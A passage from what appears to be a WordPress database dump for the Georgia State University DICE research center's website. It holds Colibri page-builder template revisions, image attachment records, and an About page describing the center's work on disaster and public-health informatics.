gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg h-col-md h-col-auto style-133-outer style-local-37-m3-outer\">\n <div data-colibri-id=\"37-m3\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-133 style-local-37-m3 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"37-m4\" class=\"h-global-transition-all h-heading style-134 style-local-37-m4 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-134 style-local-37-m4\">\n <!---->\n <!---->\n <h2 class=\"\">404</h2>\n </div>\n </div>\n <div data-colibri-id=\"37-m5\" class=\"h-text h-text-component style-135 style-local-37-m5 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Sorry, page not found!</p>\n </div>\n </div>\n <div data-colibri-id=\"37-m6\" class=\"h-x-container style-136 style-local-37-m6 position-relative h-element\">\n <!---->\n <div class=\"h-x-container-inner style-dynamic-37-m6-group\">\n <!----><span class=\"h-button__outer style-137-outer style-local-37-m7-outer d-inline-flex h-element\"><a h-use-smooth-scroll=\"true\" href=\"[colibri_home_url]\" data-colibri-id=\"37-m7\" class=\"d-flex w-100 align-items-center h-button justify-content-lg-center justify-content-md-center justify-content-center style-137 style-local-37-m7 position-relative\"><!----><!----> <span >Go to Homepage!</span> <span class=\"h-svg-icon h-button__icon style-137-icon style-local-37-m7-icon\"><!--Icon by Icons8 Line Awesome (https://icons8.com/line-awesome)-->[colibri_svg_icon name=icons8-line-awesome/arrow-right]</span></a>\n </span>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','main_404','','inherit','closed','closed','','37-revision-v1','','','2022-02-15 15:45:54','2022-02-15 15:45:54','',37,'https://gsudice.dataconn.net/?p=88',0,'revision','',0),(89,1,'2022-02-15 15:45:54','2022-02-15 15:45:54','<div data-colibri-id=\"40-m1\" class=\"style-138 style-local-40-m1 position-relative\">\n <!---->\n <div data-colibri-id=\"40-m2\" class=\"h-row-container gutters-row-lg-3 gutters-row-md-3 gutters-row-2 gutters-row-v-lg-3 gutters-row-v-md-3 gutters-row-v-3 colibri-dynamic-list style-139 style-local-40-m2 position-relative\">\n <!---->\n <div data-colibri-component=\"\" class=\"h-row justify-content-lg-start justify-content-md-start justify-content-start align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-3 gutters-col-md-3 gutters-col-2 gutters-col-v-lg-3 gutters-col-v-md-3 gutters-col-v-3 style-139-row style-local-40-m2-row\">\n <!---->[colibri_loop query=\"false\"]%5Bcolibri_item_template%5D%0A%20%20%20%20%20%20%20%20%3Cdiv%20%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-12%20h-col-md-12%20h-col-12%20%5Bcolibri_post_class%5D%20masonry-item%20style-140-outer%20style-local-40-m3-outer%22%20%20%3E%3Cdiv%20%20%20data-colibri-id=%2240-m3%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-3%20h-px-md-3%20h-px-3%20v-inner-lg-3%20v-inner-md-3%20v-inner-3%20style-140%20style-local-40-m3%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%5Bcolibri_layout_wrapper%20name=%22categories_container%22%5D%3Cdiv%20%20%20%20data-colibri-id=%2240-m4%22%20class=%22h-row-container%20gutters-row-lg-0%20gutters-row-md-0%20gutters-row-0%20gutters-row-v-lg-0%20gutters-row-v-md-0%20gutters-row-v-0%20style-141%20style-local-40-m4%20position-relative%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-row%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20align-items-lg-stretch%20align-items-md-stretch%20align-items-stretch%20gutters-col-lg-0%20gutters-col-md-0%20gutters-col-0%20gutters-col-v-lg-0%20gutters-col-v-md-0%20gutters-col-v-0%22%3E%3C!----%3E%20%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-142-outer%20style-local-40-m5-outer%22%20%20%20%3E%3Cdiv%20%20data-colibri-id=%2240-m5%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-0%20v-inner-md-0%20v-inner-0%20style-142%20style-local-40-m5%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%2240-m6%22%20class=%22h-blog-categories%20style-143%20style-local-40-m6%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_categories%20prefix=%22%22%5D%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%5B/colibri_layout_wrapper%5D%3Cdiv%20%20%20data-colibri-id=%2240-m7%22%20class=%22h-blog-title%20style-144%20style-local-40-m7%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_title%20heading_type=%22h4%22%20classes=%22colibri-word-wrap%22%5D%3C/div%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%2240-m8%22%20class=%22h-blog-meta%20style-145%20style-local-40-m8%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20name=%221%22%20class=%22metadata-item%22%3E%3Cspan%20class=%22metadata-prefix%22%3Eby%20%3C/span%3E%20%3Ca%20href=%22%5Bcolibri_post_meta_author_url%5D%22%3E%3C!----%3E%5Bcolibri_post_meta_author_content%5D%3C/a%3E%20%3Cspan%20class=%22meta-separator%22%3E%7C%20%3C/span%3E%3C/div%3E%3Cdiv%20name=%222%22%20class=%22metadata-item%22%3E%3Cspan%20class=%22metadata-prefix%22%3Eon%20%3C/span%3E%20%3Ca%20href=%22%5Bcolibri_post_meta_date_url%5D%22%3E%3C!----%3E%5Bcolibri_post_meta_date_content%20date_format=%22F%20j,%20Y%22%5D%3C/a%3E%3C/div%3E%3C!----%3E%3C!----%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%2240-m9%22%20class=%22style-146%20style-local-40-m9%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_excerpt%20max_length=%22%22%5D%3C/div%3E%3C/div%3E%3Cdiv%20%20%20%20data-colibri-id=%2240-m10%22%20class=%22h-x-container%20style-147%20style-local-40-m10%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20%20class=%22h-x-container-inner%20style-dynamic-40-m10-group%22%3E%3C!----%3E%3Cspan%20%20%20class=%22h-button__outer%20style-148-outer%20style-local-40-m11-outer%20d-inline-flex%20h-element%22%20%20%20%20%3E%3Ca%20%20h-use-smooth-scroll=%22true%22%20href=%22%5Bcolibri_post_link%5D%22%20%20data-colibri-id=%2240-m11%22%20class=%22d-flex%20w-100%20align-items-center%20h-button%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20style-148%20style-local-40-m11%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cspan%20%3Eread%20more%3C/span%3E%20%3Cspan%20%20class=%22h-svg-icon%20h-button__icon%20style-148-icon%20style-local-40-m11-icon%22%3E%3C!--Icon%20by%20Icons8%20Line%20Awesome%20(https://icons8.com/line-awesome)--%3E%5Bcolibri_svg_icon%20name=icons8-line-awesome/arrow-right%5D%3C/span%3E%3C/a%3E%3C/span%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%0A%20%20%20%20%20%20%5B/colibri_item_template%5D%0A%20%20%20%20%20%20[/colibri_loop]\n </div>\n </div>[colibri_layout_wrapper name=\"navigation_container\"]\n <div data-colibri-id=\"40-m12\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-149 style-local-40-m12 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg h-col-md h-col style-150-outer style-local-40-m13-outer\">\n <div data-colibri-id=\"40-m13\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-150 style-local-40-m13 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-151-outer style-local-40-m14-outer\">\n <div data-colibri-id=\"40-m14\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-2 v-inner-md-2 v-inner-2 style-151 style-local-40-m14 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"40-m15\" class=\"style-152 style-local-40-m15 position-relative h-element\">\n <!---->\n <div class=\"archive-nav-button h-global-transition-all\">[colibri_archive_nav_button type=\"prev\" next_label=\"Next\" prev_label=\"Back\"]</div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-153-outer style-local-40-m16-outer\">\n <div data-colibri-id=\"40-m16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-2 v-inner-md-2 v-inner-2 style-153 style-local-40-m16 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"40-m17\" class=\"style-154 style-local-40-m17 position-relative h-element\">\n <!---->\n <div class=\"h-global-transition-all\">[colibri_archive_pagination]</div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-155-outer style-local-40-m18-outer\">\n <div data-colibri-id=\"40-m18\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-2 v-inner-md-2 v-inner-2 style-155 style-local-40-m18 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"40-m19\" class=\"style-156 style-local-40-m19 position-relative h-element\">\n <!---->\n <div class=\"archive-nav-button h-global-transition-all\">[colibri_archive_nav_button type=\"next\" next_label=\"Next\" prev_label=\"Back\"]</div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>[/colibri_layout_wrapper]\n <div data-colibri-id=\"40-m20\" id=\"search-results\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-157 style-local-40-m20 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-12 h-col-md-12 h-col-12 style-158-outer style-local-40-m21-outer\">\n <div data-colibri-id=\"40-m21\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-158 style-local-40-m21 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <hop-archive-navigation previewid=\"40-m22\" hmodel=\"[object Object]\" parentmodelobj=\"[object Object]\" rootmodel=\"[object Object]\" ispreview=\"true\" class=\"h-element\"></hop-archive-navigation>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','main_search','','inherit','closed','closed','','40-revision-v1','','','2022-02-15 15:45:54','2022-02-15 15:45:54','',40,'https://gsudice.dataconn.net/?p=89',0,'revision','',0),(90,1,'2022-02-15 15:45:54','2022-02-15 15:45:54','<div disabled-ui=\"true\" data-colibri-id=\"43-s1\" class=\"style-160 style-local-43-s1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"43-s2\" id=\"blog-sidebar\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-161 style-local-43-s2 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"43-s3\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-166 style-local-43-s3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-167-outer style-local-43-s4-outer\">\n <div data-colibri-id=\"43-s4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-167 style-local-43-s4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-component=\"widget-area\" data-colibri-id=\"43-s5\" class=\"h-widget-area style-168 style-local-43-s5 position-relative h-element\">\n <!---->\n <div class=\"widget-shortcode h-global-transition-all\">[colibri_widget_area id=\"sidebar-1\"]</div>\n <div data-aos-selector=\".widget\" data-colibri-id=\"43-s6\" class=\"position-relative h-element\" style=\"display: none;\">\n <!---->\n </div>\n <div data-aos-selector=\".widget\" data-colibri-id=\"43-s7\" class=\"position-relative h-element\" style=\"display: none;\">\n <!---->\n </div>\n <div data-aos-selector=\".widget\" data-colibri-id=\"43-s8\" class=\"position-relative h-element\" style=\"display: none;\">\n <!---->\n </div>\n <div data-aos-selector=\".widget\" data-colibri-id=\"43-s9\" class=\"position-relative h-element\" style=\"display: none;\">\n <!---->\n </div>\n <div data-aos-selector=\".widget\" data-colibri-id=\"43-s10\" class=\"position-relative h-element\" style=\"display: none;\">\n <!---->\n </div>\n <div data-aos-selector=\".widget\" data-colibri-id=\"43-s11\" class=\"position-relative h-element\" style=\"display: none;\">\n <!---->\n </div>\n <div data-aos-selector=\".widget\" data-colibri-id=\"43-s12\" class=\"position-relative h-element\" style=\"display: none;\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','sidebar_post','','inherit','closed','closed','','43-revision-v1','','','2022-02-15 15:45:54','2022-02-15 15:45:54','',43,'https://gsudice.dataconn.net/?p=90',0,'revision','',0),(91,1,'2022-02-15 15:45:54','2022-02-15 15:45:54','<div disabled-ui=\"true\" data-colibri-id=\"46-s1\" class=\"style-176 style-local-46-s1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"46-s2\" id=\"product-sidebar\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-177 style-local-46-s2 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"46-s3\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-182 style-local-46-s3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-183-outer style-local-46-s4-outer\">\n <div data-colibri-id=\"46-s4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-183 style-local-46-s4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-component=\"widget-area\" data-colibri-id=\"46-s5\" class=\"h-widget-area style-184 style-local-46-s5 position-relative h-element\">\n <!---->\n <div class=\"widget-shortcode h-global-transition-all\">[colibri_widget_area id=\"ecommerce-left\"]</div>\n <div data-aos-selector=\".widget\" data-colibri-id=\"46-s6\" class=\"position-relative h-element\" style=\"display: none;\">\n <!---->\n </div>\n <div data-aos-selector=\".widget\" data-colibri-id=\"46-s7\" class=\"position-relative h-element\" style=\"display: none;\">\n <!---->\n </div>\n <div data-aos-selector=\".widget\" data-colibri-id=\"46-s8\" class=\"position-relative h-element\" style=\"display: none;\">\n <!---->\n </div>\n <div data-aos-selector=\".widget\" data-colibri-id=\"46-s9\" class=\"position-relative h-element\" style=\"display: none;\">\n <!---->\n </div>\n <div data-aos-selector=\".widget\" data-colibri-id=\"46-s10\" class=\"position-relative h-element\" style=\"display: none;\">\n <!---->\n </div>\n <div data-aos-selector=\".widget\" data-colibri-id=\"46-s11\" class=\"position-relative h-element\" style=\"display: none;\">\n <!---->\n </div>\n <div data-aos-selector=\".widget\" data-colibri-id=\"46-s12\" class=\"position-relative h-element\" style=\"display: none;\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','sidebar_product','','inherit','closed','closed','','46-revision-v1','','','2022-02-15 15:45:54','2022-02-15 15:45:54','',46,'https://gsudice.dataconn.net/?p=91',0,'revision','',0),(93,1,'2022-02-15 15:48:54','2022-02-15 15:48:54','https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-header-scaled-1.jpg','cropped-header-scaled-1.jpg','','inherit','open','closed','','cropped-header-scaled-1-jpg','','','2022-02-15 15:48:54','2022-02-15 15:48:54','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-header-scaled-1.jpg',0,'attachment','image/jpeg',0),(94,1,'2022-02-15 15:50:06','2022-02-15 15:50:06','https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-DICE-log-6-sides-Largbox_text-e1644937921882.png','cropped-DICE-log-6-sides-Largbox_text-e1644937921882.png','','inherit','open','closed','','cropped-dice-log-6-sides-largbox_text-e1644937921882-png','','','2022-02-15 15:50:06','2022-02-15 15:50:06','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-DICE-log-6-sides-Largbox_text-e1644937921882.png',0,'attachment','image/png',0),(95,1,'2022-02-15 15:50:10','2022-02-15 15:50:10','','colibri-image-299.png','','inherit','open','closed','','colibri-image-299-png','','','2022-02-15 15:50:10','2022-02-15 15:50:10','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/02/colibri-image-299.png',0,'attachment','image/png',0),(96,1,'2022-02-15 15:50:11','2022-02-15 15:50:11','','colibri-image-298.png','','inherit','open','closed','','colibri-image-298-png','','','2022-02-15 15:50:11','2022-02-15 15:50:11','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/02/colibri-image-298.png',0,'attachment','image/png',0),(103,1,'2022-02-15 15:56:55','2022-02-15 15:56:55','','marc-szeglat-BsAzhHIIwxg-unsplash','','inherit','open','closed','','marc-szeglat-bsazhhiiwxg-unsplash','','','2022-02-15 15:56:55','2022-02-15 15:56:55','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/02/marc-szeglat-BsAzhHIIwxg-unsplash.jpg',0,'attachment','image/jpeg',0),(104,1,'2022-02-15 15:57:06','2022-02-15 15:57:06','https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-marc-szeglat-BsAzhHIIwxg-unsplash-scaled-1.jpg','cropped-marc-szeglat-BsAzhHIIwxg-unsplash-scaled-1.jpg','','inherit','open','closed','','cropped-marc-szeglat-bsazhhiiwxg-unsplash-scaled-1-jpg','','','2022-02-15 15:57:06','2022-02-15 15:57:06','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-marc-szeglat-BsAzhHIIwxg-unsplash-scaled-1.jpg',0,'attachment','image/jpeg',0),(122,1,'2022-02-15 16:17:51','2022-02-15 16:17:51','<div data-colibri-id=\"122-c1\" class=\"style-280 style-local-122-c1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"122-c2\" id=\"about\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-285 style-local-122-c2 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"122-c3\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-286 style-local-122-c3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-287-outer style-local-122-c4-outer\">\n <div data-colibri-id=\"122-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-287 style-local-122-c4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"122-c5\" class=\"h-global-transition-all h-heading style-288 style-local-122-c5 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-288 style-local-122-c5\">\n <!---->\n <!---->\n <h5 class=\"\">Who are we?</h5>\n </div>\n </div>\n <div data-colibri-id=\"122-c6\" class=\"h-global-transition-all h-heading style-289 style-local-122-c6 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-289 style-local-122-c6\">\n <!---->\n <!---->\n <h4 class=\"\">The Center for Disaster Informatics & Computational Epidemiology (DICE) at Georgia State University</h4>\n </div>\n </div>\n <div data-colibri-id=\"122-c7\" class=\"h-text h-text-component style-290 style-local-122-c7 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>... brings together scientists and practitioners from diverse domains to develop computational methodologies that facilitate research in Public Health, Disaster Mitigation, and Response Planning. DICE will enable translational research\n that enhances population resilience to the adverse impacts of disasters and diseases using data-driven approaches and computational tools and through meaningful engagement with academic collaborators; government, industry, and non-profit\n partners; and local communities.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-291-outer style-local-122-c8-outer\">\n <div data-colibri-id=\"122-c8\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-291 style-local-122-c8 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"122-c9\" id=\"about-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-292 style-local-122-c9 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"122-c10\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-293 style-local-122-c10 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-294-outer style-local-122-c11-outer\">\n <div data-colibri-id=\"122-c11\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-294 style-local-122-c11 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-295-outer style-local-122-c12-outer\">\n <div data-colibri-id=\"122-c12\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-295 style-local-122-c12 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"122-c13\" class=\"h-global-transition-all h-heading style-296 style-local-122-c13 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-296 style-local-122-c13\">\n <!---->\n <!---->\n <h5 class=\"\">What do we do?</h5>\n </div>\n </div>\n <div data-colibri-id=\"122-c14\" class=\"h-text h-text-component style-298 style-local-122-c14 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>While increasing the level of regional resilience to disasters is paramount, the barriers that limit access to disaster mitigation resources also lead to access disparities in Population Health. Whether determining access disparities\n that prevent individuals from accessing specific health resources or estimating the risk of exposure to vector-borne diseases, expertise from a multiplicity of scientific domains is required to develop tools that effectively facilitate\n these efforts. DICE provides the necessary resources for the required collaborations and shall serve as an interface between researchers and practitioners</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','About','','publish','closed','closed','','about','','','2024-11-07 12:22:25','2024-11-07 17:22:25','',0,'https://gsudice.dataconn.net/?page_id=122',0,'page','',0),(123,1,'2022-02-15 16:17:35','2022-02-15 16:17:35','{\"version\": 2, \"isGlobalStylesUserThemeJSON\": true }','Custom Styles','','publish','closed','closed','','wp-global-styles-colibri-wp','','','2022-02-15 16:17:35','2022-02-15 16:17:35','',0,'https://gsudice.dataconn.net/2022/02/15/wp-global-styles-colibri-wp/',0,'wp_global_styles','',0),(124,1,'2022-02-15 16:17:51','2022-02-15 16:17:51','','About','','inherit','closed','closed','','122-revision-v1','','','2022-02-15 16:17:51','2022-02-15 16:17:51','',122,'https://gsudice.dataconn.net/?p=124',0,'revision','',0),(125,1,'2022-02-15 16:18:11','2022-02-15 16:18:11','','About Us','','inherit','closed','closed','','122-revision-v1','','','2022-02-15 16:18:11','2022-02-15 16:18:11','',122,'https://gsudice.dataconn.net/?p=125',0,'revision','',0),(126,1,'2022-02-15 16:18:43','2022-02-15 16:18:43','<div data-colibri-id=\"126-c1\" class=\"style-338 style-local-126-c1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c32\" id=\"about-6\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-388 style-local-126-c32 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c33\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-389 style-local-126-c33 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-390-outer style-local-126-c34-outer\">\n <div data-colibri-id=\"126-c34\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-390 style-local-126-c34 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-391-outer style-local-126-c35-outer\">\n <div data-colibri-id=\"126-c35\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 